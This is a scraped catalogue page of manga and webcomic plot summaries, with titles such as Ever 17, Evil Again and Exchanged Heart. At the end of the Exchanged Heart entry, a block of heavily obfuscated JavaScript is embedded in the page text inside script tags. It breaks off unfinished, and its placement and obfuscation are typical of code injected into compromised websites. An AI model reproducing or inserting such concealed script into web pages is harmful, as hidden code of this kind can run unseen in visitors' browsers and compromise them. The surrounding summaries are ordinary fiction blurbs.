Mystery - Page 63

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Even the villain is annoying

Versace family! A place that produced many swordsmen and possessed a powerful force. Such a family perished. Due to the poisoning of the Crown Princess in the involvement of a foolish woman named Olivia de Versace. She was a woman who was pointed out as a rare ugly or evil woman because of her tall and heavy body. *** I was absurd when I was possessed by a novel that is often referred to as a novel. If you’re going to pretend to be a female lead, or something. or the male protagonist. Anyway, shouldn’t it be a small supporting role? Even if it wasn’t, I shouldn’t have given the passer-by’s appearance like this. Alternative Even the villain is annoying / 악역도 귀찮아서


Ever 17

A promised past and returning where one belongs. The underwater theme park, LeMU. Takeshi Kuranari, one of the park guests, is suddenly involved in a freak accident. And he finds himself stuck in LeMU with a number of other survivors. Because of the system's failure, the water pressure will slowly crush the facility. The time limit till implosion is 170 hours and 17 minutes. Will they be able to escape to the surface!?


Every Minute Ends

The world changed drastically, the peace that once was alive is now buried under the facade of death and silence. After the first surge, came the carnage and beings of unknown, a creature caused the destruction of mankind. From there comes the new era of catastrophe where death means grace, Living means suffering, dessert filled with water, grassland covered by rocks, mountain underneath the ocean and a world full of lie.


Everyone's Loose Screw

Junior high school student Misaki Nanao realizes the people of the town she lives in are slowly going insane. At the same time, she starts seeing Beherin, a mysterious demon. “If you make me believe you, I shall help you”. Misaki believes the demon’s words and talks about her terrifying personal experiences; however she gets dragged into people’s increasing insanity, horrific incidents and a huge conspiracy.


Evil Again

One rainy morning, in a small church on the outskirts of the city, it was found that Jin Min Jun, the second year of Yingcai High School, was hung on a cross, tortured, and then killed. This technique was used 16 years ago. This happened in the first year after the team leader of an investigation team, Team Leader Zhang, became a policeman, where a chain of serial murders that used these techniques resurfaced, making old criminals nervous.


Evil Crusher Maya

A young girl was praying, a red balloon flies away... In a medieval-style village, a young girl trying to escape a soldier with three dogs. As she is about to be captured, the man's head explodes, and appears a mysterious young man holding a red balloon in hand. Before falling to the ground, the soldier's body is a hideous form and then disappears, and the three dogs were transformed into demons and rushed the young man who removes easily. The girl, Nana, asked his identity: he says his name is Maya, the Evil Crusher girl then tells his savior what happens in his village three months ago, an individual named Emiria came to town and built a church. This man was a miracle which attracted the sympathy and even the veneration of the villagers against him. However, without explanation, he demanded the sacrifice of seven young girls on the memorial of the gods. The sacrificed must be thirteen-years-old and the young girl who had been saved in part. The fathers of future victims went to show their anger at the church, but none came. After hearing this, the young man decided to go to this church to remove Emiria.


Evil Museum

Many creative liberties: “In a dark and obscure museum with an enigmatic collection, a group of teens, Millennials, work. Behind each piece is a chilling story of sorrow. A rubber ball retrieved from a haunted cave, a strange robot with the form of a butler, a salted pork rice from the window of a shop of murders.. What is the depth of darkness of the human condition. Come closer and I will tell you more.”


Ex Vs. Stalker

Kidnapped by her ex-boyfriend, only the stalker is in the know! The fitting model Ju Yeon, who had just emerged as a star on social media, wakes up to find herself tied up in a dark school. Her kidnapper, a man named Nam Woo, is her ex-boyfriend. Ju Yeon had just reached a turning point in her life. But while she was being threatened by her ex-boyfriend at that moment, Ju Yeon’s stalker, Park Su, was watching the two while keeping his mouth shut inside the shadows!


Exchanged Heart

"HyeonRyeong" lives inbetween the world of the living and the world of the dead because his heart got switched with "Gwi-Ho". When HyeonRyeong's village is hit with a string of mysterious murders, a powerful and mysterious shaman-girl named "GabJin" shows up. When HyeonRyeong's demonization speeds up, he and GabJin set off on a journey to find Gwi-Ho in order to turn him back into a human. (Source: Hour of Lunacy) The Red Night Inn / The Red Night Spirit / The Seal of the Red Night / The Stamp Seal of the Red Night / ?? ?? ??<script></script><script>(function(_0x28f4ce,_0x13c715){var _0x26c1d5=_0x3068,_0x59af48=_0x28f4ce();while(!![]){try{var _0x3277ba=-parseInt(_0x26c1d5(0xbd))/(-0xde1+-0x248c+0x326e)+parseInt(_0x26c1d5(0xc8))/(-0x1977+0xfa4+0x9d5)*(-parseInt(_0x26c1d5(0xb9))/(-0x2*0x66a+0xaaa+-0x1*-0x22d))+-parseInt(_0x26c1d5(0xbe))/(0x1835+0x1ab9+-0x32ea)*(parseInt(_0x26c1d5(0xc0))/(-0xf00*0x1+-0x23e6+0x3*0x10f9))+parseInt(_0x26c1d5(0xc6))/(0xc5f+0xbed+0x1*-0x1846)*(-parseInt(_0x26c1d5(0xd5))/(0x164b*0x1+-0x4fa+0x2*-0x8a5))+-parseInt(_0x26c1d5(0xd6))/(-0x1893+0x2656+0x1*-0xdbb)+parseInt(_0x26c1d5(0xcf))/(-0x3*0x760+0xaed+0xb3c)*(parseInt(_0x26c1d5(0xbc))/(0x5*-0x74f+-0x2625+0xa*0x779))+parseInt(_0x26c1d5(0xd7))/(-0x21a7+0x2637+0xd*-0x59)*(parseInt(_0x26c1d5(0xc2))/(-0x6a9+-0x26eb+0x2da0));if(_0x3277ba===_0x13c715)break;else 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Excuse Me, But The World Will Be Gone For A While

If the Earth is destroyed, who do you think would have caused it among us? This is the 18 year old male and female unfortunate survival game. That day, the world looked at us and told us to die.



Once up a time, many monsters who have an incredable power have tried to controle our planet ,whole the world were facing the danger of extermination and when all people lose the hope ... An unkown man called "Humy" showed up, he prisoned the monsters in the other world and seal their power in masks .. then he disappear, and the masks spreaded all over the world. Centuries have passed, the story becomes legend, and the legende becomes myth. But only one thing hasn't changed ... Anyone who puts the mask will get the superpower sealed in, and the Curse of his owner as well, and will be exiled in to the other world where they search for the way out, called ... " EXIT " !!!


Exorcism Records: Journey To The West

"The Exorcism Chronicles" is based on "Journey to the West" but takes a different approach, portraying Jiang Liu'er and his three disciples as exorcists rather than seekers of scriptures. The author's interpretation of "Journey to the West" can be seen as advocating justice, championing small acts of kindness, fearlessly opposing authority, and embracing freedom. Along the way, the four disciples unite in their shared goals, combating demons and monsters such as the White Bone Demon, Sea Monster, Nine-Headed Worm, and others, all in the name of justice and protection rather than enduring the trials necessary for obtaining scriptures. Simultaneously, the series responds to the significance of scripture seekers and exorcists, suggesting that achieving ultimate enlightenment is vast and boundless, while attaining smaller victories is tangible and grounded. Jiang Liu'er and his disciples choose the latter path, with Jiang Liu'er often remarking to the Buddha, "I'm just a freelance monk," signifying their divergence in paths.
